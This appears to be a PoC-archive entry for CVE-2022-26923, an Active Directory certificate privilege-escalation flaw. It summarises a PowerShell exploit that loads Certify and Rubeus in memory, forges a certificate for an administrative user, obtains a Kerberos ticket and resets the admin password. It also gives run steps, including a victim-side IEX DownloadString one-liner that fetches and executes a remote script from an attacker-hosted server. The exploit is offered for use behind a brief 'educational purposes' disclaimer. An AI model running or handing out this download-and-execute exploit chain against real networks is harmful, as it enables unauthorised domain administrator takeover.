Associated vulnerability
Title:
Microsoft Windows Active Directory trust management vulnerability
(CVE-2022-26923)
Description: Microsoft Windows Active Directory is a centralized directory management service from Microsoft (USA) for administering medium-to-large network environments. It stores information about objects on the network and makes that information easy for administrators and users to find and use. Microsoft Windows Active Directory contains a trust management vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Syst
Description
A PowerShell PoC that loads Certify and Rubeus into memory and runs them automatically.
Introduction
# CVE-2022-26923-Powershell-POC
A PowerShell PoC that loads Certify and Rubeus into memory and runs them automatically.
# How it works
1. Loads Certify.exe and Rubeus.exe into memory.
2. Scans the target machine for misconfigured certificate templates (more on https://www.youtube.com/watch?v=HBRCI5O35R8).
3. Requests a certificate for the administrative user based on the vulnerable template.
4. Sends the certificate to the certificate handler, which converts it to .pfx format and sends it back to the client.
5. Uses Rubeus to load the certificate and obtain a ticket for the administrative user.
6. Changes the administrative user's password (for the demo only).
The PoC was tested on the following TryHackMe lab: https://tryhackme.com/room/adcertificatetemplates
This CVE is used for privilege escalation, so neither this demo nor the THM lab covers initial exploitation.
Steps:
1. python3 -m http.server 80 [Attacker Box]
2. python3 uploader.py 8000 [Attacker Box]
3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]
Note: This PoC is for educational purposes only; you are responsible for your own actions.
File snapshot
[4.0K] /data/pocs/adb5c92c3b5685529e32231207081f57ae618224
├── [803K] poc.ps1
├── [1.1K] README.md
└── [2.0K] uploader.py
0 directories, 3 files
Notes
1. We recommend accessing the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.